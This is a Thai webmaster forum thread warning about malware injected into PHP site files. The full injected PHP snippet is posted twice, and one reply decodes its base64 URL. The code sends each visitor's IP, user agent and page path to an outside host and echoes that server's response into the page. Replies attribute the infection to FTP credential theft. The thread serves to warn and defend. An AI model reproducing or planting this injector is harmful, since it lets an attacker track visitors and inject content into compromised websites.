แจ้งเตือนมัลแวร์ตัวร้ายครับ ติดไปหมดทุกเว็บ ของใครโดนแบบนี้บ้างดูครับ

jaideeplazadotcom · 30 มีนาคม 2012, 09:35:46

ไฟล์ที่มันไปฝังอยู่ index.php footer.php page.php ของทุกๆโฟเดอร์เลยทีเดียว เป็นตั้งแต่ wp ยันเว็บเขียนเองครับ

มาในรูปแบบข้างล่างเลย ขอเตือนกลับไปเช็คเว็บท่านดูนะ ว่ามีโค้ตแปลกปลอมดังที่ว่าไหม

โค้ด เลือก


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

vikorn · 30 มีนาคม 2012, 09:41:37

ติดได้ยังไงครับ สาเหตุจากอะไรครับ น่าจะมีสาเหตุหลักๆ นะ ใครเวบเยอะๆ คงไล่เช็คไม่ไหว

Webincare · 30 มีนาคม 2012, 09:43:58

ติดไปทุกๆเว็บจริงๆหรอ

chui761 · 30 มีนาคม 2012, 10:38:11

ลองใช้ kaspersky ของแท้ในเครื่องของท่านดูครับ

ตั้งแต่ผมใช้มา 3-4 ปีละ ไม่มีปัญหาเรื่องติดไวรัสบนเว็บอีกเลย ตะก่อน ต้องมาคอยแก้ทุกปี

แถมลองเอาไฟล์เก่าๆ ที่เคยเก็บไว้ก่อนหน้าที่ไม่ได้ใช้ KIS กะเอามาโมหน่อย ตัว KIS ก็สแกนเจอว่ามันติดไวรัสอยู่ด้วยครับ บางทีกว่ามันจะแสดงอาการก็นานอยู่ ทั้งที่ไฟล์อาจจะติดไวรัสไปเรียบร้อยแล้ว

jaideeplazadotcom · 30 มีนาคม 2012, 10:48:41

ผมเช็คทั้ง webmaster tool มันก็บอกไม่มีอะไรเลย แต่เอาโค้ตมาดู มีตัวแปลกปลอมเพิ่มขึ้นมาดังที่กล่าวเลยครับ ตอนนี้กลุ้มใจเลย ไม่รู้ติดมาจากไหน จาก ftp หรือไม่ก็ไม่รู้ แต่ตอนนี้เปลียนพาสไปแล้ว จะรอดูอาการก่อน ถ้าไม่หายสงสัยต้องล้างบางลงใหม่

ปล.มันติดเร็วมากครับ กำลังหาวิธีแก้อยู่

DataCenterAsia.com · 30 มีนาคม 2012, 10:53:28

เท่าที่เคยเจอคือ

เป็น trojan ที่ติดมาตอนเราไปเิปิดเวบที่มีการวาง script ไว้
ซึ่ง trojan นี้จะทำการดัก username/password ของ ftp ที่เราใช้ แล้วทำการส่งไปยังคนร้าย
คนร้ายก็เอาไป ftp เข้า server แล้วก็ทำการ download ไฟล์ของเรา แล้วก็เอามาแก้ไข แล้วก็ upload ขึ้นให้ใหม่

แล้วเวบเราก็จะกลายเป็นแหล่งแพร่เชื้อของพวกนี้ครับ

QA. · 30 มีนาคม 2012, 10:57:23

น่ากลัว

kangtung · 30 มีนาคม 2012, 10:59:22

มันได้ Password คุณไป นะสิ แล้วก็ไปวางโค๊ด
ผมก็เคยโดนแฮ็ก เอาพาสเวอร์ด ผู้ชมคลิกเว็บผมจากผลการค้นหาใน Search Engind พวกเล่น Redirect ไปเว็บโป๊หมดเลย

รักจะทำเว็บอย่าเหนียวตังค์โปรแกรม Antivirus ให้ใช้พวก Internet Security ไปลย
อย่าไปหาล็อกอิน กับเครื่องตามร้านเกมส์
อย่าไปล็อกอินที่เครื่องเพื่อน

เพียงได้ User Name กับ Password แล้วเค๊าทำอะไรเว็บคุณได้หมดครับ

KONINW · 30 มีนาคม 2012, 11:03:34

อ้างถึงจาก: jaideeplazadotcom ใน 30 มีนาคม 2012, 09:35:46
ไฟล์ที่มันไปฝังอยู่ index.php footer.php page.php ของทุกๆโฟเดอร์เลยทีเดียว เป็นตั้งแต่ wp ยันเว็บเขียนเองครับ

มาในรูปแบบข้างล่างเลย ขอเตือนกลับไปเช็คเว็บท่านดูนะ ว่ามีโค้ตแปลกปลอมดังที่ว่าไหม

โค้ด เลือก ขยาย
<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>

เข้ารหัสไว้ หุหุ

โค้ด เลือก

http://adveconfirm.com/stat/stat.php

richmind · 30 มีนาคม 2012, 11:06:33

เวปผมใช้ wp ก็เป็นบางธีมครับ (รู้ได้ด้วย firefox)
พอดีผมไม่ใช่โปรแกรมเมอร์ เลยไม่ค่อยรู้เรื่องโค้ด
พอจะมีวิธีเช็คได้ยังไงครับ ว่าส่วนไหนเป็นมัลแวร์

jaideeplazadotcom · 30 มีนาคม 2012, 11:14:49

ร้ายกาจจริงๆ มึนเลยวันนี้

นั่งไล่แก้จนมึนแล้ว

NNuoi · 30 มีนาคม 2012, 11:19:59

มีคนโดนแล้วเหมือนกัน
http://www.thaiseoboard.com/index.php?action=;topic=262596.0

jaideeplazadotcom · 30 มีนาคม 2012, 11:23:59

อ้างถึงจาก: NNuoi ใน 30 มีนาคม 2012, 11:19:59
มีคนโดนแล้วเหมือนกัน
http://www.thaiseoboard.com/index.php?action=;topic=262596.0

เหมือนของผมเดะๆเลยครับ ไอ้เข้ทำพิษซะแล้ว